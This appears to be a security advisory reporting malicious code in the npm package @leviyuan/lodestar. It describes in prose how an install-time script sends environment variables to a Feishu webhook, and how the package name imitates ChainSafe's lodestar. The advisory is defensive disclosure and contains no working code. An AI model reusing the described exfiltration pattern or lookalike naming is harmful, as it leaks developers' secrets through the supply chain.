—

MAL-2026-4804

Malicious code in @leviyuan/lodestar (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8c295b3a16fad72f7b165d049e75feb88883dcc1b5b8d9d72b52ac7b40aa09ba) The package ships a lifecycle-invoked script (dist/lodestar-setup.js) that performs an HTTP POST to a hardcoded https://open.feishu.cn endpoint, with process.env data referenced in the same file. dist/lodestar.js similarly contains multiple POST calls to the same Feishu infrastructure. The hardcoded third-party C2 destination (Feishu's open API, used as a webhook receiver) combined with environment-variable access is the canonical exfiltration shape: any developer or build system that installs this package will leak environment contents to the publisher's webhook. The package name (@leviyuan/lodestar) is also a scoped lookalike of the well-known Ethereum consensus client 'lodestar' from ChainSafe, which compounds the supply-chain risk by inviting confused installs.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / @leviyuan/lodestar

No fixed version published yet for @leviyuan/lodestar (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/@leviyuan/lodestar/v/0.4.2 [PACKAGE]